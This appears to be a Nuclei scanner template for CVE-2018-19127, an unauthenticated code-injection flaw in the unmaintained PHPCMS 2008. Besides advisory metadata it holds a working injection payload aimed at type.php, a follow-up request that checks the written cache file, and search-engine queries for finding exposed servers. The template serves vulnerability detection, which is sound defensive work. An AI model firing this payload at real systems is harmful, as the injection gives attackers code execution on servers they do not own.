id: CVE-2018-19127 info: name: PHPCMS 2008 - Remote Code Execution via Template Injection author: tomaquet18 severity: critical description: | PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable. impact: | Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control. remediation: | The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it. reference: - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127 - https://github.com/advisories/GHSA-p498-q357-m3p7 - https://nvd.nist.gov/vuln/detail/CVE-2018-19127 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-19127 epss-score: 0.84485 epss-percentile: 0.99342 cwe-id: CWE-94 cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"Powered by phpcms" fofa-query: body="Powered by phpcms" vendor: phpcms product: phpcms-2008 tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln flow: http(1) || http(2) variables: num: "999999999" payload: "tag_(){};echo(md5({{num}}));{//../rss" http: - method: GET path: - "{{BaseURL}}/type.php?template={{payload}}" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "value=\"picture", "phpcms", "{{md5(num)}}")' condition: and internal: true - method: GET path: - "{{BaseURL}}/data/cache_template/rss.tpl.php" matchers: - type: word words: - "{{md5(num)}}" # digest: 4a0a0047304502204c4da5b12ac378bf9fbbc761d7aef8c7c51195413a725d2da9c73a8b7be24784022100c61c91346c15fd5d1dd919b85d78a321f54ed6c62cd50a8c37156eb521d3c9ac:922c64590222798bb761d5b6d8e72950